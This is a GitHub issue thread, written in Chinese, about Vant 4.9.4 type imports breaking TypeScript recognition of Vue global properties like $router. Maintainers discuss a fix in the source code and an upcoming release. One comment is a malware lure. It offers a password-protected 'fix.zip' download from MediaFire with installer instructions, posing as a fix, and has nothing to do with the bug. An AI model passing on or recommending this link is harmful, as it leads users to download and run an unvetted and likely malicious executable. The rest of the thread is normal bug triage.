### ISSUE TITLE
从类型文件中导入某个类型之后，会导致 vue 全局属性识别异常。

### ISSUE THREAD

**Issue by LLoyou00** [youzan/vant#13086]
### 重现链接

https://github.com/LLoyou00/bug_report

### Vant 版本

4.9.4

### 描述一下你遇到的问题。

起因是我对 VanField 组件进行二次封装，因为我用的是 ts，所以导入了 FieldRule 用来给 props 进行类型声明，然后我发现所有自定义的 vue 全局属性都提示 does not exist（实际不影响使用），经过排查后，确认是 Vant  导致的，可能我的表述不是很准确，但这个问题很容易复现。

![image](https://github.com/user-attachments/assets/2c0c2179-b452-4e5e-9740-3267fb083615)
以上是正常情况，可以看到可以识别 $router 的类型，如果我把 import VantButton 的语句取消注释，就会报错。
![image](https://github.com/user-attachments/assets/4dfc562d-7d5e-47da-8de9-5dbef2ccc8fc)

### 重现步骤

新建空白 vue 项目，使用 ts 语法，安装 vue-router
在任意 vue 文件中导入一个  vant 的组件

复现环境
VS Code 1.89.1
Vue - Official 2.0.28

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LLoyou00** [comment]
![image](https://github.com/user-attachments/assets/15f41788-ec63-4e19-a77c-69146bafd888)
进一步确认是这个文件导致的，那这样的话，应该就是 vue 自己的问题了

**Comment by inottn** [comment]
#13067

**Comment by LLoyou00** [comment]
> #13067

这个 PR 只改了 lib 目录下的文件，但如果使用自动导入的话，会导入 es 目录下的文件，还是会有这个问题。
![image](https://github.com/user-attachments/assets/ce677151-df86-4a26-899b-b4588431605c)

**Comment by inottn** [comment]
改的是源码，不过新版本还没发布，等到时候发布了，你再试一下

**Comment by LLoyou00** [comment]
> 改的是源码，不过新版本还没发布，等到时候发布了，你再试一下

好的，感谢回复。

**Comment by chenjiahan** [comment]
这周会发个新版本
